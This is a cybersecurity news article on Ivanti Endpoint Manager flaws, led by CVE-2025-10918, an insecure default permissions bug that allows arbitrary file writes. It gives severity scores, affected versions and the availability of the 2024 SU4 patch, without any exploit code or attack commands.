    The most recent issue, tracked as CVE-2025-10918, stems from insecure default permissions in the Endpoint Manager agent versions prior to 2024 SU4.

    This vulnerability carries a CVSS score of 7.1 (High), with a vector of CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H, and aligns with CWE-276 for incorrect default permissions. Attackers with local authenticated access could leverage it to overwrite critical files, escalating privileges or disrupting operations.

    Ivanti Endpoint Manager Vulnerabilities

    Ivanti also patched two previously disclosed vulnerabilities from October 2025: CVE-2025-9713 and CVE-2025-11622. While specific details on these were not reiterated in the latest advisory, they contribute to the same arbitrary file write threat model.

    Importantly, Ivanti reports no known customer exploitation of any of these issues at the time of disclosure, crediting its responsible disclosure program for early detection.

    Affected systems include Ivanti Endpoint Manager 2024 SU3 SR1 and earlier versions. The fixes are available in the newly released 2024 SU4 update, downloadable via Ivanti’s License System portal for eligible customers.

    Users on the older 2022 branch face a harder road: that version reached end-of-life at the end of October 2025, so no patches will be issued. Organizations must upgrade to 2024 SU4 to mitigate risks.

    CVE NumberDescriptionCVSS Score (Severity)Attack RequirementsPotential Impact
    CVE-2025-10918Insecure default permissions in the agent allow a local authenticated attacker to write arbitrary files anywhere on disk.7.1 (High)Local authenticated access.File tampering, privilege escalation via overwrites.
    CVE-2025-9713Path traversal allows a remote unauthenticated attacker to achieve remote code execution, enabling arbitrary file writes; user interaction required.8.8 (High)Remote unauthenticated, user interaction (e.g., malicious file import).RCE leading to full system compromise and file manipulation.
    CVE-2025-11622Insecure deserialization allows a local authenticated attacker to escalate privileges, facilitating arbitrary file writes post-escalation.7.8 (High)Local authenticated access.Privilege escalation enabling broader file access and execution.

    Ivanti extends its thanks to security researcher Enrique Fernández Lorenzo, known as bighound, for responsibly reporting CVE-2025-10918. The company emphasizes its commitment to vulnerability disclosure, inviting ethical hackers to engage through its policy.

    For those assessing exposure, Ivanti notes no public indicators of compromise exist yet, as exploitation remains undetected. Administrators should prioritize patching to safeguard endpoint management integrity. With cyber threats evolving rapidly, timely updates remain a cornerstone of defense in managed IT ecosystems.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Ivanti Endpoint Manager Vulnerabilities Let Attackers Write Arbitrary Files to Disk appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶